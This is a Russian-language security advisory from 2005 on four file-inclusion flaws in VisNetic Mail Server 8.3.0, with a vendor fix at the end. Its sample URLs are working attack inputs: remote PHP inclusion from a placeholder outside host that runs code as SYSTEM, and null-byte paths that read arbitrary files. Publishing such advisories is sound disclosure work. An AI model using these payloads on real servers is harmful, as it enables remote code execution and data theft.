Security Lab

Множественные уязвимости в VisNetic Mail Server

Дата публикации:28.12.2005
Всего просмотров:3098
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-3131
CVE-2005-3132
CVE-2005-3133
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: VisNetic Mail Server 8.x
Уязвимые версии: VisNetic Mail Server 8.3.0 build 1, возможно более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к потенциально важным данным и выполнить произвольный PHP код на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в переменных "language" и "lang_settings" в сценариях "/accounts/inc/include.php" и "/admin/inc/include.php". Удаленный пользователь может переопределить глобальные переменные и, с помощью специально сформированного URL, выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[host]:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/

Удачная эксплуатация уязвимости позволит злоумышленнику выполнить PHP сценарий с привилегиями SYSTEM в конфигурации по умолчанию.

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" сценария "/dir/include.html". Удаленный пользователь может просмотреть произвольные файлы на системе. Пример:

http://[host]:32000/dir/include.html?lang=[file]%00

3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "language" в сценарии "/mail/settings.html". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями SYSTEM в конфигурации по умолчанию. Пример:

http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;

4. Уязвимость существует из-за недостаточной инициализации переменных "default_layout" и "layout_settings" при обработке неизвестного HTTP_USER_AGENT. Удаленный пользователь может просмотреть произвольные файлы на системе. Пример:

Example (using non-IE/Mozilla/Firefox browser):
http://[host]:32000/mail/index.html?/mail/index.html?
default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2

URL производителя: www.deerfield.com/products/visnetic-mailserver/

Решение: Установите последнюю версию (8.3.5) с сайта производителя.

Источник:

Ссылки: IceWarp Web Mail Multiple File Inclusion Vulnerabilities